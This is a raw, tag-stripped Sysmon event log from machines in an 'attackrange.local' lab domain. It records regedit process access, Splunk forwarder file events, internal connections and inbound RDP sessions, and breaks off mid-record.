09:23:12.786{5EBD8912-8CC0-6151-1600-00000000FD01}12961784C:\Windows\system32\svchost.exe{5EBD8912-8D80-6151-AF00-00000000FD01}5156C:\Windows\regedit.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001056576Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:23:12.786{5EBD8912-8CC0-6151-1600-00000000FD01}12961336C:\Windows\system32\svchost.exe{5EBD8912-8D80-6151-AF00-00000000FD01}5156C:\Windows\regedit.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001056575Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:23:12.661{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001056574Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:23:12.661{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001056573Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:23:12.661{5EBD8912-8D26-6151-8500-00000000FD01}27602120C:\Windows\system32\csrss.exe{5EBD8912-8D80-6151-AF00-00000000FD01}5156C:\Windows\regedit.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001056572Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:23:12.661{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001056571Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:23:12.661{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001056570Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:23:12.661{5EBD8912-8D2A-6151-9600-00000000FD01}46324024C:\Windows\Explorer.EXE{5EBD8912-8D80-6151-AF00-00000000FD01}5156C:\Windows\regedit.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+a909f|C:\Windows\System32\windows.storage.dll+a8d15|C:\Windows\System32\windows.storage.dll+a8806|C:\Windows\System32\windows.storage.dll+a9c78|C:\Windows\System32\windows.storage.dll+a862e|C:\Windows\System32\windows.storage.dll+ab445|C:\Windows\System32\windows.storage.dll+ab7c4|C:\Windows\System32\windows.storage.dll+aae00|C:\Windows\System32\windows.storage.dll+ad62a|C:\Windows\System32\windows.storage.dll+ad3e2|C:\Windows\System32\SHELL32.dll+3f8bd|C:\Windows\System32\SHELL32.dll+3e456|C:\Windows\System32\SHELL32.dll+801d1|C:\Windows\System32\SHELL32.dll+6716e|C:\Windows\System32\SHELL32.dll+3d433|C:\Windows\System32\SHELL32.dll+3d2fb|C:\Windows\System32\SHELL32.dll+3cc17|C:\Windows\System32\SHELL32.dll+3c8dc|C:\Windows\System32\SHELL32.dll+e2157|C:\Windows\System32\SHELL32.dll+e20b5 154100x80000000000000001056569Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:23:12.660{5EBD8912-8D80-6151-AF00-00000000FD01}5156C:\Windows\regedit.exe10.0.14393.953 (rs1_release_inmarket.170303-1614)Registry EditorMicrosoft® Windows® Operating SystemMicrosoft CorporationREGEDIT.EXE"C:\Windows\regedit.exe" C:\Users\Administrator\ATTACKRANGE\Administrator{5EBD8912-8D28-6151-085E-080000000000}0x85e082HighMD5=BF5D30514FEA913E25CCC9E546257088,SHA256=254B18A8CC6589AF666EE17CE4E76C67350AECF578206CC7678745ED47A32D63,IMPHASH=E6DBB62DC548A099806914C678466448{5EBD8912-8D2A-6151-9600-00000000FD01}4632C:\Windows\explorer.exeC:\Windows\Explorer.EXE /NOUACCHECK 23542300x80000000000000001056568Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:23:12.396{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9649021DF2FCDB5AAC538DC64B1E4E47,SHA256=2011D94FDBC04015A1B39ACAD1DA11550F5C89149F21FF8F9227C2AFD6A6FCDF,IMPHASH=00000000000000000000000000000000falsetrue 13241300x80000000000000001056567Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-SetValue2021-09-27 09:23:12.396{5EBD8912-8CC0-6151-1000-00000000FD01}440C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\W32Time\Config\LastKnownGoodTimeQWORD (0x01d7b381-0x4b2ab2fe) 354300x8000000000000000981130Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:23:08.835{69CF5F33-7F33-614D-6600-00000000FD01}4076C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-542.attackrange.local59532-false10.0.1.12-8000- 23542300x8000000000000000981133Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:23:13.932{69CF5F33-7F29-614D-1D00-00000000FD01}1960NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=72F9D15A308A3AFACD92589D17F2C03E,SHA256=E0EA3012FF17D797A034C0E7F787325C50EBFE6C56FB1128CC9B4A2A94A03D83,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000981132Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:23:13.760{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D1BF31526CF26E9809BD5B9EC0802BBC,SHA256=D48DA5AEBC73A213245E47633A7519A7CA4E8ADBED53072E08BDAE749771CDE0,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001056594Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:23:11.677{5EBD8912-8CD0-6151-2A00-00000000FD01}2404C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local63271- 23542300x80000000000000001056593Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:23:13.646{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=2ED934339C42C57247779669C672D7F0,SHA256=DA135693948AF30F95BBD9C0DB48945D6D31F0DBC2DD2F54B427C585CA5C4DBE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001056592Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:23:13.646{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=19AEFC71ABDD8D4AA889264536B796CB,SHA256=04430A04B2834407221BD828313906F1D65A7496C35183F1A591A7B14A925BB2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001056591Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:23:13.411{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=19207CAE541095AC1CDA7ABC2E9E9BF6,SHA256=86EFAEE7EEB9B94BEBA8979B7B9C6A3BCD8A760BB05120164FD00069ABD85510,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000981134Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:23:14.838{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F3E0E4505196A9A9D3B4722605BD897A,SHA256=74D24E226AE99D640C39D30AAE94DC62AB41C5872AE5A1F9594D8B9986EB52EE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001056595Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:23:14.458{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3F3D1DCECA10B7C83CDD5AD0179562D6,SHA256=3FBF54FF47F3D8A48CAA6E0272F853944161887A1703F3B7B0875D190DCE2707,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000981138Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:23:15.870{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=AB65B6CA32B5A43476BB91464C315EB8,SHA256=07E85BF2D826C2B3237412BDEFB398398BD93B7784D7F28E851A80AC9CBA0C58,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000981137Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:23:15.870{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=65AC27D981E07566708DD1A45B965753,SHA256=56E809CFAA5898A928B36665DB1B56E762017870934D5D7FEA311E20D04817B2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000981136Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:23:15.870{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=0FC84AC70193F6804D8B6F452F398AA1,SHA256=C8746508886593430A7461A5E4F11877C24C865794AED611F8C3B90E84D830BD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001056597Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:23:15.521{5EBD8912-8CD0-6151-3000-00000000FD01}1956NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=72F9D15A308A3AFACD92589D17F2C03E,SHA256=E0EA3012FF17D797A034C0E7F787325C50EBFE6C56FB1128CC9B4A2A94A03D83,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001056596Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:23:15.505{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1C16FEC233347EF3139CE488DB36B4F1,SHA256=5CABDE79437B556932FA94DAC02E2256E491ECE7DA71B32D213AF143BF9182D7,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000981135Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:23:12.554{69CF5F33-7F29-614D-1D00-00000000FD01}1960C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-542.attackrange.local59533-false10.0.1.12-8089- 354300x80000000000000001056599Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:23:15.161{5EBD8912-8CDC-6151-6E00-00000000FD01}2608C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local54231-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x80000000000000001056598Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:23:16.740{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=81536FBB2DA2CAF0927A2FD1BA12FC14,SHA256=71472546D712269AC28C776C62D6FE886558AF8631A546737516C362F194F28C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000981140Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:23:16.885{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DA48988AE40EA7F96D9B5CA9FBE712DC,SHA256=BF887E5783E82C46C0F3DC8EAD74E3DD9A0E8E9667F7B098F646E63DF64B8C46,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000981139Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:23:12.836{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-52784-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x8000000000000000981144Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:23:17.932{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1785C2F24C1DEDA96002532C35F5456A,SHA256=E5B96522FCFF5A809BC8B0C622D3F5B275477C006D2F124E031510C0599B5E2A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001056602Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:23:17.865{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F023F8355A5E2A3A607A04FF2B20A916,SHA256=F4A08F64CA4BCC214748D5E4510DF96B242653EF6A04A6A82B1FF78A12ADDE5C,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001056601Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:23:15.458{5EBD8912-8CD0-6151-3000-00000000FD01}1956C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local54232-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8089- 23542300x80000000000000001056600Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:23:17.193{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=2ED934339C42C57247779669C672D7F0,SHA256=DA135693948AF30F95BBD9C0DB48945D6D31F0DBC2DD2F54B427C585CA5C4DBE,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000981143Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:23:14.789{69CF5F33-7F33-614D-6600-00000000FD01}4076C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-542.attackrange.local59534-false10.0.1.12-8000- 354300x8000000000000000981142Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:23:14.456{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-53777-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x8000000000000000981141Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:23:17.620{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=AB65B6CA32B5A43476BB91464C315EB8,SHA256=07E85BF2D826C2B3237412BDEFB398398BD93B7784D7F28E851A80AC9CBA0C58,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001056607Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:23:18.865{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=18E88C51F3D027CE90EC9A1E7957C1E3,SHA256=2AFC4ADF2329DE1B53499BAC23F06FBEA92D111DE413842882392FBBECC4C20F,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001056606Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:23:18.068{5EBD8912-8D29-6151-8C00-00000000FD01}3408784C:\Windows\System32\RuntimeBroker.exe{5EBD8912-8D29-6151-8E00-00000000FD01}4160C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+3810b|C:\Windows\System32\TokenBroker.dll+1158a|C:\Windows\System32\TokenBroker.dll+d335|C:\Windows\System32\TokenBroker.dll+d669|C:\Windows\System32\TokenBroker.dll+1ff53|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+129f|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+3b27c|C:\Windows\System32\combase.dll+3af32|C:\Windows\System32\combase.dll+8addb|C:\Windows\System32\combase.dll+8c2d2|C:\Windows\System32\combase.dll+39b93|C:\Windows\System32\combase.dll+8c4dd|C:\Windows\System32\combase.dll+37f4c|C:\Windows\System32\combase.dll+36c7f|C:\Windows\System32\combase.dll+524b9|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde 10341000x80000000000000001056605Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:23:18.068{5EBD8912-8D29-6151-8C00-00000000FD01}3408784C:\Windows\System32\RuntimeBroker.exe{5EBD8912-8D29-6151-8E00-00000000FD01}4160C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+3810b|C:\Windows\System32\TokenBroker.dll+22ee6|C:\Windows\System32\TokenBroker.dll+114b3|C:\Windows\System32\TokenBroker.dll+d335|C:\Windows\System32\TokenBroker.dll+d669|C:\Windows\System32\TokenBroker.dll+1ff53|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+129f|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+3b27c|C:\Windows\System32\combase.dll+3af32|C:\Windows\System32\combase.dll+8addb|C:\Windows\System32\combase.dll+8c2d2|C:\Windows\System32\combase.dll+39b93|C:\Windows\System32\combase.dll+8c4dd|C:\Windows\System32\combase.dll+37f4c|C:\Windows\System32\combase.dll+36c7f|C:\Windows\System32\combase.dll+524b9|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d 10341000x80000000000000001056604Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:23:18.068{5EBD8912-8D29-6151-8C00-00000000FD01}34084044C:\Windows\System32\RuntimeBroker.exe{5EBD8912-8D29-6151-8E00-00000000FD01}4160C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+3810b|C:\Windows\System32\TokenBroker.dll+1158a|C:\Windows\System32\TokenBroker.dll+d335|C:\Windows\System32\TokenBroker.dll+d669|C:\Windows\System32\TokenBroker.dll+1ff53|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+129f|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+3b27c|C:\Windows\System32\combase.dll+3af32|C:\Windows\System32\combase.dll+8addb|C:\Windows\System32\combase.dll+8c2d2|C:\Windows\System32\combase.dll+39b93|C:\Windows\System32\combase.dll+8c4dd|C:\Windows\System32\combase.dll+37f4c|C:\Windows\System32\combase.dll+36c7f|C:\Windows\System32\combase.dll+524b9|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde 10341000x80000000000000001056603Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:23:18.068{5EBD8912-8D29-6151-8C00-00000000FD01}34084044C:\Windows\System32\RuntimeBroker.exe{5EBD8912-8D29-6151-8E00-00000000FD01}4160C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+3810b|C:\Windows\System32\TokenBroker.dll+22ee6|C:\Windows\System32\TokenBroker.dll+114b3|C:\Windows\System32\TokenBroker.dll+d335|C:\Windows\System32\TokenBroker.dll+d669|C:\Windows\System32\TokenBroker.dll+1ff53|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+129f|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+3b27c|C:\Windows\System32\combase.dll+3af32|C:\Windows\System32\combase.dll+8addb|C:\Windows\System32\combase.dll+8c2d2|C:\Windows\System32\combase.dll+39b93|C:\Windows\System32\combase.dll+8c4dd|C:\Windows\System32\combase.dll+37f4c|C:\Windows\System32\combase.dll+36c7f|C:\Windows\System32\combase.dll+524b9|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d 23542300x80000000000000001056608Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:23:19.975{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program 